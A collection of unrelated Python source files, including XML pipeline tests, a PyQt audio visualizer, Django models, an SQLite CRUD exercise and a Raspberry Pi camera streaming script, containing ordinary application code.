<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="es-ES">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="pt-BR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
<dc:subject xml:lang="fr-FR">COVID-19 in Brazil: advantages of a socialized unified health system and preparation to contain cases</dc:subject>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Keywords().transform(data)
self.assertEqual(3, len(xml.findall(".//field[@name='keyword_es']")))
self.assertEqual(2, len(xml.findall(".//field[@name='keyword_pt']")))
self.assertEqual(4, len(xml.findall(".//field[@name='keyword_fr']")))
# <field name="is_citable">is_true</field>
class TestIsCitable(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.IsCitable().transform(data)
self.assertEqual("is_true", xml.find(".//field[@name='is_citable']").text)
# <field name="use_license"></field>
# <field name="use_license_text"></field>
# <field name="use_license_uri"></field>
class TestPermission(unittest.TestCase):
def test_transform(self):
text = """<root xmlns:dc="http://www.openarchives.org/OAI/2.0/provenance">
<record>
<metadata>
<oai_dc:dc
xmlns:oai_dc="http://www.openarchives.org/OAI/2.0/oai_dc/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai_dc/
http://www.openarchives.org/OAI/2.0/oai_dc.xsd">
<dc:rights xml:lang="pt-BR">Copyright (c) 2020 Julio Croda, Wanderson Kleber de Oliveira, Rodrigo Lins Frutuoso, Luiz Henrique Mandetta, Djane Clarys Baia-da-Silva, José Diego Brito-Sousa, Wuelton Marcelo Monteiro, Marcus Vinícius Guimarães Lacerda</dc:rights>
<dc:rights xml:lang="pt-BR">https://creativecommons.org/licenses/by/4.0</dc:rights>
</oai_dc:dc>
</metadata>
</record>
</root>
"""
xml = ET.Element("doc")
raw = ET.fromstring(text)
data = raw, xml
raw, xml = pipeline_xml.Permission().transform(data)
self.assertEqual(
xml.find(".//field[@name='use_license_ur']").text,
"https://creativecommons.org/licenses/by/4.0"
)
self.assertEqual(
xml.find(".//field[@name='use_license_text']").text,
"Copyright (c) 2020 Julio Croda, Wanderson Kleber de Oliveira, Rodrigo Lins Frutuoso, Luiz Henrique Mandetta, Djane Clarys Baia-da-Silva, José Diego Brito-Sousa, Wuelton Marcelo Monteiro, Marcus Vinícius Guimarães Lacerda",
)
self.assertEqual(
xml.find(".//field[@name='use_license_uri']").text,
"https://creativecommons.org/licenses/by/4.0"
)
|
__all__ = ['priors', 'logging', 'gpu_utils', 'utils', 'driver',
'fit_model', 'galaxy', 'instrument', 'isochrones', 'plotting',
'results', 'metalmodels', 'agemodels', 'dustmodels',
'distancemodels', 'sfhmodels', 'data', '__version__']
from .simulation import gpu_utils
from . import instrument
from .simulation import driver
from .isochrones import isochrones
from .galaxy import (galaxy, metalmodels, dustmodels, sfhmodels,
distancemodels)
from .sampling import (fit_model, priors, logging, results)
from .utils import (utils)
from .plotting import (plotting)
# from .results import (results)
from . import data
GPU_AVAIL = gpu_utils._GPU_AVAIL
GPU_ACTIVE = gpu_utils._GPU_ACTIVE
# rename for backwards compatability
gpu_utils._CUDAC_AVAIL = GPU_ACTIVE
agemodels = sfhmodels
__version__ = "0.9.3"
|
'''
用画刷填充图形区域
'''
import math
import random
import sys
import threading
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from com.music_Play import MyThread
class musicGraphy(QWidget):
def __init__(self):
super(musicGraphy, self).__init__()
self.musicPlay = MyThread()
self.resize(500, 500)
self.setWindowTitle('Music')
# self.setWindowFlags(Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint)
self.preData = []
self.speed=1
self.penWidth=1
self.isPlay=False
self.rotate = 0
def setMusicName(self,path):
self.musicPlay.init(path)
def initValue(self,data):
self.Lrcfont=data.get('Lrcfont',QFont('SimSun',15))
self.showPic = data.get('showPic',True)
self.musicID=eval(data.get('musicID','{}'))
self.gap = data.get('gap', 0.5)
self.recHeight = data.get("recHeight", 400)
self.recWidth = data.get("recWidht", 400)
self.PenColor = data.get('penColor', QColor(255, 255, 255))
self.brushid = data.get('brushid', 6)
self.type = data.get('type', 0)
self.brushfill_reverse = data.get("reverse", 'False')
self.loX = data.get('loX', 200)
self.loY = data.get('loY', 200)
self.circleR = data.get('circleR', 100)
self.paintMethod = [self.myPaint_circle_points, self.myPaint_circle_line, self.myPaint_circle_Rec,
self.myPaint_line_Rec_one, self.myPaint_line_Rec_two]
self.chunk = 64
self.win_Width =data.get('win_Width',500)
self.win_Height = data.get('win_Height',500)
self.setFixedSize(self.win_Width,self.win_Height)
self.win_loX = data.get('win_lox',200)
self.win_loY = data.get('win_loy',200)
self.penWidth =data.get('penWidht',1)
self.move(self.win_loX,self.win_loY)
def setWinAdapt(self):
self.setFixedSize(self.win_Width,self.win_Height)
self.move(self.win_loX,self.win_loY)
def setWin_Width(self,width):
self.win_Width = width
self.setWinAdapt()
def setWin_Height(self, height):
self.win_Height = height
self.setWinAdapt()
def setWin_X(self,x):
self.win_loX = x
self.setWinAdapt()
def setWin_Y(self,y):
self.win_loY =y
self.setWinAdapt()
def setSpeed(self,s):
self.speed=s
def setShowPic(self, showPic):
self.showPic = showPic
def setLrcfont(self,qfont):
self.Lrcfont = qfont
def setReverse(self, bool):
self.brushfill_reverse = bool
def playVisible(self):
self.update()
t = threading.Timer(0.1, self.playVisible)
t.start()
def myPaint_circle_points(self, qp):
if self.showPic:
qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
self.image)
for i, h in enumerate(self.musicPlay.wavedata):
self.setBrush(self.brushid, qp, h)
if (i % 2) == 0:
d1 = (i * 1.0 / self.chunk) * math.pi * 2
d2 = (i + self.gap) / self.chunk * math.pi * 2
h = int(abs(self.recHeight * h))
point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
int((self.circleR + h) * math.sin(d2) + self.loY))
point2 = QPoint(int((self.circleR + h) * math.cos(d1) + self.loX),
int((self.circleR + h) * math.sin(d1) + self.loY))
qp.drawPoints(point1)
qp.drawPoints(point2)
def setPenwidth(self,w):
self.penWidth = w
def setRecHeight(self, h):
self.recHeight = h
def setRecWidth(self, w):
self.recWidth = w
def setGap(self, gap):
self.gap = gap
def setBrushid(self, id):
self.brushid = id
def setChunk(self, chunk):
self.musicPlay.setChunk(chunk)
self.chunk = chunk
def setQColor(self, color):
self.PenColor = color
def setloX(self, x):
self.loX = x
def setloY(self, y):
self.loY = y
def setR(self, r):
self.circleR = r
def setType(self, type):
self.type = type
def myPaint_circle_line(self, qp):
if self.showPic:
qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
self.image)
for i, h in enumerate(self.musicPlay.wavedata):
# image.save('/home/void/work/Python/musicPlayer/com/img/circle.png')## 防止格式不行,转换一下
d1 = (i * 1.0 / self.chunk) * math.pi * 2
d2 = (i + self.gap) / self.chunk * math.pi * 2
h = int(abs(self.recHeight * h))
point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
int((self.circleR + h) * math.sin(d2) + self.loY))
point2 = QPoint(int((self.circleR) * math.cos(d1) + self.loX),
int((self.circleR) * math.sin(d1) + self.loY))
qp.drawLine(point1, point2)
def myPaint_circle_Rec(self, qp):
if self.showPic:
qp.drawImage(QRect(self.loX - self.circleR, self.loY - self.circleR, 2 * self.circleR, 2 * self.circleR),
self.image)
for i, h in enumerate(self.musicPlay.wavedata):
# self.setBrush(self.brushid, qp, h)
if (i % 2) == 0:
d1 = (i * 1.0 / self.chunk) * math.pi * 2
d2 = (i + self.gap) / self.chunk * math.pi * 2
# qp.setBrush(QColor(255, (int)(d1 / math.pi / 2 * 255), (int)(random.random() * 255)))
# qp.setPen(QColor(255, (int)(d1 / math.pi / 2 * 255), (int)(random.random() * 255)))
h = int(abs(self.circleR * h))
point1 = QPoint(int((self.circleR + h) * math.cos(d2) + self.loX),
int((self.circleR + h) * math.sin(d2) + self.loY))
point2 = QPoint(int((self.circleR + h) * math.cos(d1) + self.loX),
int((self.circleR + h) * math.sin(d1) + self.loY))
point3 = QPoint(int(self.circleR * math.cos(d2) + self.loX),
int(self.circleR * math.sin(d2) + self.loY))
point4 = QPoint(int(self.circleR * math.cos(d1) + self.loX),
int(self.circleR * math.sin(d1) + self.loY))
polygon = QPolygon([point1, point2, point4, point3])
qp.drawPolygon(polygon)
else:
d1 = (i * 1.0 / self.chunk) * math.pi * 2
d2 = (i + self.gap) / self.chunk * math.pi * 2
# qp.setBrush(QColor(255, (int)(d1 / math.pi / 2 * 255), (int)(random.random() * 255)))
# qp.setPen(QColor(255, (int)(d1 / math.pi / 2 * 255), (int)(random.random() * 255)))
h = int(abs(self.recHeight * h))
point1 = QPoint(int((self.circleR - h) * math.cos(d2) + self.loX),
int((self.circleR - h) * math.sin(d2) + self.loY))
point2 = QPoint(int((self.circleR - h) * math.cos(d1) + self.loX),
int((self.circleR - h) * math.sin(d1) + self.loY))
point3 = QPoint(int(self.circleR * math.cos(d2) + self.loX),
int(self.circleR * math.sin(d2) + self.loY))
point4 = QPoint(int(self.circleR * math.cos(d1) + self.loX),
int(self.circleR * math.sin(d1) + self.loY))
polygon = QPolygon([point4, point3, point1, point2])
qp.drawPolygon(polygon)
def setBrush(self, choice, qp, value):
if self.brushfill_reverse == 'True':
value = 1 - value
if choice == 0:
##彩虹
qp.setBrush(QColor((int)(random.random() * 255), random.random() * 255, (int)(random.random() * 255)))
return
elif choice == 1:
##红紫
qp.setBrush(QColor(255, (int)(value * 255), (int)(random.random() * 255)))
return
elif choice == 2:
##红橙黄
qp.setBrush(QColor(255, (int)(random.random() * 255), (int)(value * 255)))
return
elif choice == 3:
##绿黄
qp.setBrush(QColor((int)(random.random() * 255), 255, (int)(value * 255)))
return
elif choice == 4:
##白灰黑
qp.setBrush(QColor((int)(value * 255), int(value * 255), (int)(value * 255)))
return
elif choice == 5:
##浅蓝黄
qp.setBrush(QColor((int)(value * 255), 255, (int)((1 - value) * 255)))
return
elif choice == 6:
##浅紫黄
qp.setBrush(QColor(255, (int)(value * 255), (int)((1 - value) * 255)))
return
else:
##黑
qp.setBrush(QColor(0, 0, 0))
return
def myPaint_line_Rec_one(self, qp):
qp.setPen(self.PenColor)
for i, h in enumerate(self.musicPlay.wavedata):
self.setBrush(self.brushid, qp, h)
qp.drawRect(i * self.recWidth + self.loX, (int)((self.loY - abs(h) * self.recHeight)),
int(self.recWidth * (1 - self.gap)), int(abs(h) * self.recHeight))
def myPaint_line_Rec_two(self, qp):
qp.setPen(self.PenColor)
for i, h in enumerate(self.musicPlay.wavedata):
if (i % 2) == 0:
self.setBrush(self.brushid, qp, h)
qp.drawRect(i * 10 + self.loX, (int)(self.loY - abs(h) * self.recHeight),
int(self.recWidth * (1 - self.gap)),
int(abs(h) * self.recHeight))
else:
self.setBrush(self.brushid, qp, h)
qp.drawRect(i * 10 + self.loX, self.loY, int(self.recWidth * (1 - self.gap)),
int(abs(h) * self.recHeight))
def paintEvent(self, e):
if self.isPlay == False : return
qp = QPainter(self)
qp.begin(self)
image = QImage('img/circle.png')
transform = QTransform() # PyQt5
# martix.speed(90) # PyQt4,PyQt5中已废弃
transform.rotate(self.rotate) # PyQt5
self.rotate += self.speed
self.image = image.transformed(transform) # 相应的matrix改为transform
pen = QPen(self.PenColor)
pen.setWidth(self.penWidth)
qp.setPen(pen)
self.paintMethod[self.type](qp)
qp.setFont(self.Lrcfont)
qp.drawText(QRect(20,self.win_Height-100, self.win_Width, 80), Qt.AlignCenter, self.musicPlay.current_music_rlc)
qp.end()
#
# if __name__ == '__main__':
# app = QApplication(sys.argv)
# main = musicGraphy()
# main.setMusicName('/home/void/work/Python/musicPlayer/com/music/music3.wav')
# ##需要制定存储文件才能使用
# # main.initValue()
# main.musicPlay.start()
# main.playVisible()
# main.show()
# sys.exit(app.exec_())
|
import click
from aws_organized_policies import aws_organized_policies
@click.group()
def cli():
"""cli for pipeline tools"""
pass
@cli.command()
def hello() -> None:
print("Hello world")
@cli.command()
@click.argument("role_arn")
def import_organization(role_arn) -> None:
# TODO remove print
print(aws_organized_policies.import_organization_policies(role_arn))
@cli.command()
def make_migrations() -> None:
print(aws_organized_policies.make_migrations())
@cli.command()
def apply_migrations() -> None:
print(aws_organized_policies.apply_migrations())
@cli.command()
def clean_up() -> None:
print(aws_organized_policies.clean_up())
"""
@cli.command()
def write_policies() -> None:
print(scp_org.write_policies())
@cli.command()
def read_policies() -> None:
print(scp_org.read_policies())
create migration
execute organisation
@cli.command()
def foo() -> None:
print("bar")
@cli.command()
def who_am_i() -> None:
print(scp_demo.who_am_i())
@cli.command()
def how_many_buckets() -> None:
print(scp_demo.how_many_buckets())
@cli.command()
def how_many_accounts() -> None:
print(scp_org.get_client())
@cli.command()
def get_all_policies() -> None:
print(scp_org.get_policies())
"""
|
"""(°C × 9/5) + 32 = °F"""
celsius = float(input('Temperatura em °C: '))
fahrenheit = celsius * 9 / 5 + 32
print('{:.2f} °C é equivalente a {:.2f} °F.'.format(celsius, fahrenheit))
|
"""
OPERACIONES TIPO CURD CON TABLAS EN BASES DE DATOS MYSQLITE
"""
#LEER o READ--------------------------------->
# Importar librería
import sqlite3
# Conexion con base de datos
miCon = sqlite3.connect('weapons_bd')
# Cursor o puntero
miCur = miCon.cursor()
# Ejecutar consulta reed---------------------------------------------------------------------->
# Busca todos los campos segun la CLASE en la bd
miCur.execute("SELECT * FROM WEAPONS WHERE CLASE = 'Automáticas'")
# los datos seran devieltos en un array con fetchall
armas = miCur.fetchall()
# imprimir todo el array
print(armas)
# imprimir dato a dato el array
for arma in armas:
print("Id_arma: ",arma[0]," Nombre Arma: ",arma[1], " Precio: ",arma[2], " Clase: ", arma[3])
# Ejecutar insercion de varios archivos----------------------------------------------------->
liArmas = [
("Colt M1911", 1000, "Automáticas"),
("Berretta 92", 1250, "Automáticas"),
("HK usp", 2500, "Automáticas")
]
# Consulta
#--miCur.executemany("INSERT INTO WEAPONS VALUES(NULL,?,?,?)", liArmas)
#Consulta de Actualizacion update-------------------------------------------------------------->
miCur.execute("UPDATE WEAPONS SET PRECIO=2800 WHERE NOM_WEAPON='HK usp'")
#Borrar un registro----------------------------------------------------------------------------->
# Para evitar error siempre se insertara y borrara
miCur.execute("INSERT INTO WEAPONS VALUES(NULL, 'Ak 47', 4500, 'Automáticas')")
# Confirmacion de la conexion
# Borrar Registro
miCur.execute("DELETE FROM WEAPONS WHERE NOM_WEAPON = 'Ak 47'")
miCon.commit()
# Cierre de conexion
miCon.close()
|
"""API Functions.
This module implements two main functions called via HTTP.
The module structure is the following:
- Function ``predict`` is called with some arguments in order
to predict if some text contains hate speach.
- Function ``train`` is called to re-train the estimator with some new data
which will be stored in ``./estimator/resources/feedback`` folder.
"""
# Author: Alexandru Varacuta
# Email: alexburlacu96@gmail.com
import hug
import estimator.src.model as estimator
def predict(
content_name: hug.types.text,
content_data: hug.types.text,
):
"""JSON object with the class to which the content belongs.
Parameters
----------
content_name : str (Ex: hug.types.text)
Content's unique name, not the title of it.
content_data : str (Ex. hug.types.text)
Content data expressed as a text.
Returns
-------
dict
content_name : str
Content's unique name, not the title of it.
content_class : {"not-hatred", "hatred"}
The predicted class to which the queried content belongs.
"""
predicted = "hatred" if estimator.classifier(content_data) == True else "not-hatred"
return {
"content_name": content_name,
"content_class": predicted
}
def train(n_fits: int = 10):
"""Train the available Machine Learning Estimator.
Parameters
----------
n_fits : int
Number of partial fits to be executed over the estimator.
Returns
-------
dict
summary : dict
The summary of the training (start_time, training_time, measured_accuracy)
"""
summary = estimator.train_linear_clf(n_fits)
return {
"summary": summary
}
|
# Generated by Django 3.0.3 on 2020-10-08 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tag_name', models.CharField(max_length=200)),
],
),
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('completed', models.BooleanField(blank=True, default=False, null=True)),
],
),
migrations.CreateModel(
name='Image',
fields=[
('image_id', models.AutoField(primary_key=True, serialize=False)),
('description', models.TextField()),
('img', models.ImageField(upload_to='images/')),
('x', models.IntegerField()),
('y', models.IntegerField()),
('height', models.IntegerField()),
('width', models.IntegerField()),
('tags', models.ManyToManyField(to='api.Tag')),
],
),
]
|
from django.shortcuts import render
from django.views.generic.edit import FormView
from .forms import PreferenceForm
from django.contrib import messages
class CustomerForm(FormView):
form_class = PreferenceForm
template_name = 'preferences/main.html'
# redirect to same home page
def get_success_url(self):
return self.request.path
#checking if form is valid
def form_valid(self, form):
form.save()
messages.add_message(self.request, messages.INFO, 'Send Successfully')
return super().form_valid(form)
def form_invlid(self, form):
# if form is invalid return
form.add_error(None, "Ooh...Something went wrong, check form well")
return super().form_invalid(form) |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 19 16:43:18 2020
@author: chetanrupakheti
"""
"""
Container of value and right and left children
"""
class Node:
def __init__(self,x):
self.val = x
self.right = None
self.left = None
"""
Given a root node, prints out the visited nodes
"""
class SearchAlgorithm:
visitedDFS=[] ### stores visited nodes for DFS
visitedBFS=[] ### stores visited nodes for BFS
q=[] ### stores nodes in queue for BFS
def dfs(self,n):
self.visitedDFS.append(n.val)
if n.left!=None: self.dfs(n.left)
if n.right!=None: self.dfs(n.right)
return
def bfs(self,n):
self.visitedBFS.append(n.val)
if n.right!=None: self.q.append(n.right)
if n.left!=None: self.q.append(n.left)
if len(self.q)>0:
self.bfs(self.q.pop(0))
else: return
if __name__=="__main__":
n1 = Node(6) ### root
n2 = Node(5)
n3 = Node(4)
n4 = Node(3)
n5 = Node(2)
n6 = Node(1)
n1.left = n3
n1.right = n2
n3.left = n5
n3.right = n4
n5.left = n6
algo = SearchAlgorithm()
algo.dfs(n1)
print "visitedDFS",algo.visitedDFS
algo.bfs(n1)
print "visitedBFS",algo.visitedBFS
|
"""My first program for Comp110."""
__author__ = "730399808"
print("Hello, world this is a slight change.")
|
from django.db import models
from django.core.exceptions import ValidationError
from django.utils.translation import gettext as _
from django.utils import timezone
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.core.validators import MaxValueValidator, MinValueValidator
from crum import get_current_user
from constance import config as conf
from squalaetp.models import Xelon
from utils.file.export import calibre, telecode
class TagXelon(models.Model):
CAL_CHOICES = ((False, _('CAL software')), (True, "Diagbox"))
TEL_CHOICES = ((False, _('No')), (True, _("Yes")))
xelon = models.CharField(max_length=10)
comments = models.CharField('commentaires', max_length=400, blank=True)
calibre = models.BooleanField('calibration', default=False, choices=CAL_CHOICES)
telecode = models.BooleanField('télécodage', default=False, choices=TEL_CHOICES)
created_at = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(User, on_delete=models.CASCADE)
class Meta:
verbose_name = "Tag Xelon Multi"
ordering = ['-created_at']
def clean(self):
try:
telecode_tag = Xelon.objects.get(numero_de_dossier=self.xelon).telecodage
except Xelon.DoesNotExist:
telecode_tag = None
if self.calibre and calibre.check(self.xelon):
raise ValidationError(_('CALIBRE file exists !'))
elif self.telecode and telecode.check(self.xelon):
raise ValidationError(_('TELECODE file exists !'))
elif not self.telecode and telecode_tag == '1':
raise ValidationError(_('TELECODE is required !'))
elif not self.calibre and not self.telecode:
raise ValidationError(_('CALIBRE or TELECODE ?'))
def save(self, *args, **kwargs):
user = get_current_user()
if user and not user.pk:
user = None
if not self.pk:
self.created_by = user
if self.calibre:
calibre.file(self.xelon, self.comments, user)
if self.telecode:
telecode.file(self.xelon, self.comments, user)
super().save(*args, **kwargs)
def __str__(self):
return self.xelon
class CsdSoftware(models.Model):
STATUS_CHOICES = [
('Validé', 'Validé'),
('En test', 'En test'),
('Etudes', 'Etudes'),
('Abandonné', 'Abandonné'),
('PDI Only', 'PDI Only')
]
jig = models.CharField(max_length=100)
new_version = models.CharField(max_length=20)
old_version = models.CharField(max_length=20, null=True, blank=True)
link_download = models.CharField(max_length=500)
status = models.CharField(max_length=50, choices=STATUS_CHOICES)
validation_date = models.DateField(null=True, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(User, on_delete=models.CASCADE)
def save(self, *args, **kwargs):
user = get_current_user()
if user and not user.pk:
user = None
if not self.pk:
self.created_by = user
super().save(*args, **kwargs)
def __str__(self):
return self.jig
class ThermalChamber(models.Model):
CHOICES = [('FROID', 'FROID'), ('CHAUD', 'CHAUD')]
operating_mode = models.CharField('mode de fonctionnement', max_length=20, choices=CHOICES)
xelon_number = models.CharField('N° Xelon', max_length=10, blank=True)
start_time = models.DateTimeField('heure de début', blank=True, null=True)
stop_time = models.DateTimeField('heure de fin', blank=True, null=True)
active = models.BooleanField(default=True)
created_at = models.DateTimeField(auto_now_add=True)
created_by = models.ForeignKey(User, on_delete=models.CASCADE)
def save(self, *args, **kwargs):
user = get_current_user()
if user and not user.pk:
user = None
if not self.pk and user:
self.created_by = user
super().save(*args, **kwargs)
def __str__(self):
first_name, last_name = self.created_by.first_name, self.created_by.last_name
if first_name and last_name:
return f"{self.created_by.last_name} {self.created_by.first_name} - {self.xelon_number}"
else:
return f"{self.created_by.username} - {self.xelon_number}"
class ThermalChamberMeasure(models.Model):
datetime = models.DateTimeField('heure de mesure', auto_now_add=True)
value = models.IntegerField('valeur mesuré')
temp = models.CharField('température', max_length=20)
class Meta:
verbose_name = "Thermal Chamber Measure"
ordering = ['-datetime']
def __str__(self):
return self.datetime.strftime("%d/%m/%Y %H:%M")
class EtudeProject(models.Model):
name = models.CharField('projet', max_length=200)
progress = models.PositiveIntegerField('avancée en %', validators=[MaxValueValidator(100), MinValueValidator(0)])
def __str__(self):
return self.name
class Suptech(models.Model):
STATUS_CHOICES = [
('En Attente', 'En Attente'), ('En Cours', 'En Cours'), ('Cloturée', 'Cloturée'), ('Annulée', 'Annulée')
]
date = models.DateField('DATE')
user = models.CharField('QUI', max_length=50)
xelon = models.CharField('XELON', max_length=10, blank=True)
product = models.CharField('PRODUCT', max_length=200, blank=True)
item = models.CharField('ITEM', max_length=200)
time = models.CharField('TIME', max_length=10)
info = models.TextField('INFO', max_length=2000)
rmq = models.TextField('RMQ', max_length=2000, blank=True)
action = models.TextField('ACTION/RETOUR', max_length=2000, blank=True)
status = models.TextField('STATUT', max_length=50, default='En Attente', choices=STATUS_CHOICES)
deadline = models.DateField('DATE LIMITE', null=True, blank=True)
category = models.ForeignKey("SuptechCategory", on_delete=models.SET_NULL, null=True, blank=True)
is_48h = models.BooleanField("Traitement 48h", default=True)
to = models.TextField("TO", max_length=5000, default=conf.SUPTECH_TO_EMAIL_LIST)
cc = models.TextField("CC", max_length=5000, default=conf.SUPTECH_CC_EMAIL_LIST)
created_at = models.DateTimeField('ajouté le', editable=False, null=True)
created_by = models.ForeignKey(User, related_name="suptechs_created", editable=False, on_delete=models.SET_NULL,
null=True, blank=True)
modified_at = models.DateTimeField('modifié le', null=True)
modified_by = models.ForeignKey(User, related_name="suptechs_modified", on_delete=models.SET_NULL, null=True,
blank=True)
messages = GenericRelation('SuptechMessage')
class Meta:
verbose_name = "SupTech"
ordering = ['pk']
def get_absolute_url(self):
from django.urls import reverse
return reverse('tools:suptech_detail', kwargs={'pk': self.pk})
def __str__(self):
return f"{self.pk} - {self.item}"
class SuptechCategory(models.Model):
name = models.CharField('nom', max_length=200)
manager = models.ForeignKey(User, related_name="suptechs_manager", on_delete=models.SET_NULL, null=True, blank=True)
def __str__(self):
return self.name
class SuptechItem(models.Model):
name = models.CharField('Nom', max_length=100, unique=True)
extra = models.BooleanField(default=False)
category = models.ForeignKey("SuptechCategory", on_delete=models.SET_NULL, null=True, blank=True)
is_48h = models.BooleanField("Traitement 48h", default=True)
is_active = models.BooleanField("Actif", default=True)
mailing_list = models.TextField("Liste d'email", max_length=5000, default=conf.SUPTECH_TO_EMAIL_LIST)
cc_mailing_list = models.TextField("liste d'email CC", max_length=5000, default=conf.SUPTECH_CC_EMAIL_LIST)
to_users = models.ManyToManyField(User, related_name="to_sup_items", blank=True)
cc_users = models.ManyToManyField(User, related_name="cc_sup_items", blank=True)
class Meta:
verbose_name = "SupTech Item"
ordering = ['name']
def __str__(self):
return self.name
class SuptechMessage(models.Model):
content = models.TextField()
added_at = models.DateTimeField('ajouté le', auto_now=True)
added_by = models.ForeignKey(User, related_name="message_added", on_delete=models.SET_NULL, null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class Meta:
verbose_name = "SupTech Message"
ordering = ['-added_at']
def __str__(self):
return f"Message de {self.added_by} sur {self.content_object}"
def save(self, *args, **kwargs):
user = get_current_user()
if user and user.pk:
self.added_by = user
super().save(*args, **kwargs)
class SuptechFile(models.Model):
file = models.FileField(upload_to="suptech/%Y/%m")
suptech = models.ForeignKey("Suptech", on_delete=models.CASCADE)
class Meta:
verbose_name = "Suptech File"
def __str__(self):
return f"[SUPTECH_{self.suptech.pk}] {self.file.name}"
class BgaTime(models.Model):
name = models.CharField('Nom de la machine', max_length=100)
date = models.DateField('date', auto_now_add=True)
start_time = models.TimeField('heure de START', auto_now_add=True)
end_time = models.TimeField('heure de FIN', null=True)
duration = models.IntegerField('durée en secondes', null=True)
class Meta:
verbose_name = "BGA Time"
ordering = ["id"]
def save(self, *args, **kwargs):
status = kwargs.pop('status', None)
if status:
if self.pk and status.upper() == "STOP":
self.end_time = timezone.localtime().time()
elif self.pk and status.upper() == "START":
date_time = timezone.datetime.combine(self.date, self.start_time)
self.end_time = (date_time + timezone.timedelta(minutes=5)).time()
super().save(*args, **kwargs)
def __str__(self):
return f"{self.name} {self.date} {self.start_time}"
class ConfigFile(models.Model):
name = models.CharField("nom du logiciel", max_length=100, unique=True)
path = models.CharField("chemin du fichier", max_length=500, unique=True)
filename = models.CharField("nom du fichier", max_length=100)
content = models.TextField("contenu du fichier")
def __str__(self):
return self.name
|
#!/usr/bin/env python
import io
import os
import picamera
from config import WIDTH, HEIGHT, FRAMERATE, VFLIP, HFLIP
from subprocess import Popen, PIPE
from threading import Thread
from time import sleep
from HttpServer import HttpServer
from WebsocketServer import WebsocketServer
class CameraOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
self.recording = False
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
def close(self):
self.converter.stdout.close()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
camera.drc_strength = 'high'
sleep(1) # camera warm-up time
websocket_server = WebsocketServer(WIDTH, HEIGHT)
output = CameraOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
http_server = HttpServer(camera)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
websocket_server.run()
http_server.run()
print('Initializing broadcast thread')
broadcast_thread.start()
print('Everything initialized. Streaming...')
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
http_server.stop()
websocket_server.stop()
if __name__ == '__main__':
main()
|
"""
Blackmoth API class library will allow for code base in other applications to be cut down by a large amount.
Still not complete.
"""
import requests
import json
"""
GPSStream is still under development
"""
class GPSStream:
def __init__(self, ip):
self.ip_entry_data = ip
self.gps_stream_url = 'http://' + str(ip) + ':8080/gps/stream'
self.stream_data = ''
self.gps_stream()
def gps_stream(self):
try:
